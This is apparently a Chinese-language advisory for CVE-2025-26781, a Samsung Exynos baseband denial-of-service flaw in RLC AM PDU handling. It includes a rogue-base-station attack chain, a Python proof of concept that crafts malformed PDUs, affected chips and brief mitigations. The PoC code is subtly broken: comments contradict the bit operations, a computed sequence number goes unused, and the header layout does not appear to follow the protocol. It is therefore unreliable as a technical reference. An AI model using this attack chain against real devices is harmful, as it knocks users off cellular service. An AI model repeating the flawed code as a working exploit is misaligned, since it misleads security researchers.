CVE-2025-26781：三星Exynos处理器RLC AM PDU处理拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-26781

漏洞类型

拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

三星Exynos移动处理器、可穿戴处理器及调制解调器

漏洞概述

CVE-2025-26781是三星半导体Exynos系列处理器L2层（数据链路层）中存在的一个高危安全漏洞。该漏洞影响多款三星移动处理器、可穿戴处理器以及蜂窝调制解调器芯片，包括Exynos 980、990、850、1080、2100、1280、2200、1330、1380、1480、9110，以及可穿戴处理器W920、W930和调制解调器Modem 5123、Modem 5300。

漏洞的根本原因在于L2层中RLC（Radio Link Control，无线链路控制）AM（Acknowledged Mode，确认模式）PDU（Protocol Data Unit，协议数据单元）的处理逻辑存在缺陷。当设备接收到特制的、格式异常的RLC AM PDU时，由于处理程序未能正确验证或处理这些数据单元，可能导致处理器进入异常状态或资源耗尽，从而引发拒绝服务攻击。

该漏洞的CVSS 3.1评分为7.5分，属于高危级别。攻击者无需认证和用户交互，仅需通过网络即可发起攻击，对设备可用性造成严重影响。受影响的设备范围广泛，涵盖大量三星智能手机、可穿戴设备以及使用相关调制解调器的物联网设备，潜在影响面较大。由于该漏洞存在于基带处理器层面，攻击者可以通过蜂窝网络远程利用，对用户设备造成持久性影响。

技术细节

该漏洞位于三星Exynos系列处理器的L2层（数据链路层）中，具体涉及RLC（无线链路控制）子层的AM（确认模式）模式处理逻辑。

RLC层是LTE/5G NR协议栈中的重要组成部分，负责在无线接口上提供可靠的数据传输服务。AM模式是一种确认模式，通过ARQ（自动重传请求）机制保证数据的可靠传输，需要处理PDU的确认、重传、重组等功能。

漏洞的根本原因在于RLC AM PDU的处理程序对输入数据的验证不足。当攻击者构造包含畸形或异常字段的RLC AM PDU（例如长度字段异常、序列号溢出、状态PDU格式错误等）并通过蜂窝网络发送给目标设备时，处理程序可能进入以下异常状态：

1. 资源耗尽：异常PDU可能导致RLC实体不断分配内存或缓冲区，导致内存泄漏或资源耗尽。
2. 状态机混乱：畸形PDU可能使RLC状态机进入未定义状态，导致处理循环或死锁。
3. 缓冲区溢出：长度字段异常可能导致数据被写入超出预分配缓冲区的位置。

由于该漏洞存在于基带处理器层面，攻击者无需任何用户交互，仅需通过蜂窝网络基站向目标设备发送特制的LTE/5G NR信号即可触发。这使得远程攻击者可以在用户完全不知情的情况下发起攻击，导致设备基带处理器崩溃或重启，严重影响设备的通信功能。

攻击链分析

STEP 1

步骤1：搭建伪基站环境

攻击者使用软件定义无线电（SDR）设备（如USRP、LimeSDR等）配合开源LTE/5G协议栈（如srsRAN、Open5GS等）搭建一个伪基站，广播比合法基站更强的信号以诱导目标设备接入。

STEP 2

步骤2：诱导目标设备接入

目标三星设备（搭载受影响Exynos处理器）在搜索网络时，由于伪基站信号更强，会优先尝试接入伪基站，建立RRC连接。

STEP 3

步骤3：建立数据链路层连接

在RRC连接建立后，伪基站与目标设备建立L2层连接，配置RLC AM模式的无线承载（Radio Bearer）。

STEP 4

步骤4：发送畸形RLC AM PDU

攻击者通过伪基站向目标设备发送精心构造的畸形RLC AM PDU，包含无效的长度指示符、异常的序列号或格式错误的状态PDU。

STEP 5

步骤5：触发拒绝服务

目标设备的基带处理器在处理畸形PDU时，由于验证逻辑缺陷，进入异常状态，导致基带处理器崩溃、设备失去蜂窝网络连接或设备重启。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-26781 PoC - Samsung Exynos RLC AM PDU Denial of Service
# This PoC demonstrates the concept of triggering the vulnerability
# by sending malformed RLC AM PDUs to the target device.

import struct
import socket

class RLC_AM_PDU_Crafter:
    """Crafts malformed RLC AM PDUs to trigger CVE-2025-26781"""

    # RLC AM PDU types
    RLC_AM_DATA_PDU = 0x00
    RLC_AM_STATUS_PDU = 0x01

    def __init__(self):
        self.sequence_number = 0

    def craft_malformed_data_pdu(self):
        """
        Craft a malformed RLC AM Data PDU with invalid length field
        to trigger buffer overflow / resource exhaustion
        """
        # RLC AM Data PDU header
        # D/C bit = 0 (Data PDU), P bit, SI field, SN field
        # Set SI to 11 (reserved/invalid combination)
        pdu_header = 0x00
        pdu_header |= (1 << 0)   # D/C = 0 (Data PDU)
        pdu_header |= (1 << 1)   # P = 1 (Polling bit set)
        pdu_header |= (3 << 2)   # SI = 11 (invalid/reserved)
        pdu_header |= (self.sequence_number & 0x3FF) << 4  # SN (10-bit)

        # Malformed payload with excessive length indicator
        # LI field set to maximum value (127) repeatedly
        payload = b'\x7f' * 50  # Excessive length indicators

        return struct.pack('>H', pdu_header) + payload

    def craft_malformed_status_pdu(self):
        """
        Craft a malformed RLC AM Status PDU to trigger state machine confusion
        """
        # RLC AM Status PDU with invalid ACK_SN and NACK range
        status_pdu = b'\x01'  # D/C = 1 (Control PDU)
        status_pdu += struct.pack('>H', 0xFFFF)  # Invalid ACK_SN (overflow)
        # NACK with invalid range causing resource exhaustion
        status_pdu += b'\x00\x01'  # NACK_SN
        status_pdu += b'\x7f\xff'  # Invalid range (SOstart, SOend)

        return status_pdu

    def craft_overflow_sequence(self):
        """
        Craft a sequence of PDUs with rapidly incrementing sequence numbers
        to trigger sequence number overflow handling issues
        """
        pdus = []
        for i in range(1024):
            sn = (self.sequence_number + i) & 0x3FF
            pdu = self.craft_malformed_data_pdu()
            pdus.append(pdu)
        return pdus


def exploit():
    """
    Main exploit function
    Note: Actual exploitation requires a rogue base station (e.g., using SDR)
    This demonstrates the PDU crafting logic
    """
    crafter = RLC_AM_PDU_Crafter()

    # Generate malformed PDUs
    malformed_data_pdu = crafter.craft_malformed_data_pdu()
    malformed_status_pdu = crafter.craft_malformed_status_pdu()
    overflow_sequence = crafter.craft_overflow_sequence()

    print(f"[*] Crafted malformed RLC AM Data PDU: {malformed_data_pdu.hex()}")
    print(f"[*] Crafted malformed RLC AM Status PDU: {malformed_status_pdu.hex()}")
    print(f"[*] Crafted overflow sequence: {len(overflow_sequence)} PDUs")
    print("[*] These PDUs should be transmitted via a rogue base station")
    print("[*] using SDR equipment (e.g., USRP, srsLTE/Open5GS) to trigger DoS")


if __name__ == "__main__":
    exploit()

影响范围

Samsung Exynos 980

Samsung Exynos 990

Samsung Exynos 850

Samsung Exynos 1080

Samsung Exynos 2100

Samsung Exynos 1280

Samsung Exynos 2200

Samsung Exynos 1330

Samsung Exynos 1380

Samsung Exynos 1480

Samsung Exynos 9110

Samsung Wearable Processor W920

Samsung Wearable Processor W930

Samsung Modem 5123

Samsung Modem 5300

防御指南

临时缓解措施

在官方安全补丁发布之前，建议用户暂时避免在不受信任的网络环境中使用受影响设备，尤其是在可能存在伪基站攻击风险的区域（如边境地区、敏感场所等）。企业用户应通过MDM方案限制受影响设备接入敏感网络，并尽快联系三星获取修复补丁。普通用户应关注设备系统更新提示，及时安装三星推送的安全补丁。